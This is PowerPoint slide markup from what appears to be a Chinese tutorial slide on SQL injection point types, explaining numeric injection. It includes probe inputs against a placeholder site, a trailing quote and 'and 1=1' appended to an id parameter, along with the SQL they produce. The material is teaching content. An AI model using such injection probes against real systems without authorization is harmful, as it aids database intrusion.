          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962291" y="902208"/>
            <a:ext cx="0" cy="2465070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="0" h="2465070">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2465069"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="82296">
            <a:solidFill>
              <a:srgbClr val="191B0E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4444631" y="926591"/>
            <a:ext cx="660654" cy="216408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="1115896"/>
            <a:ext cx="939800" cy="245110"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入点类型</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="1357411"/>
            <a:ext cx="671195" cy="130175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>数字型注入</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454024" y="1461435"/>
            <a:ext cx="3194685"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20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>当输入的参数为整型时，如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、年龄、页码等，如果存在注入漏洞则可以认为是</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591953" y="1538395"/>
            <a:ext cx="2349500"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数字型注入。数字型注入是最简单的一种注入。例如某</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591951" y="1615359"/>
            <a:ext cx="2898775" cy="135890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="15240" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>HTTP://www.xxser.com/test.php?id-8</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>可以猜测其</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591952" y="1692319"/>
            <a:ext cx="3059430" cy="135890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="15240" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>id=8</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>在浏览器地址栏中分别输入以下地址以测试该</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>是否存在注</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454029" y="1769281"/>
            <a:ext cx="1805939" cy="243840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="15240" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="150495">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>入漏洞：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="135">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>HTTP://www.xxser.com/test.php?id=8'</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454029" y="1994441"/>
            <a:ext cx="3208655" cy="854710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="36195" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="314960" marR="5080" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="75800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="315595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>table </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>id=8',</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>这样的语句肯定会出错，导致脚本程序无 法从数据库中正常获取数据</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>从而使原来的页面出现异常。</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="150495" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="151130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>HTTP://www.xxser.com/test.php?id=8 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="314960" marR="28575" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="315595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
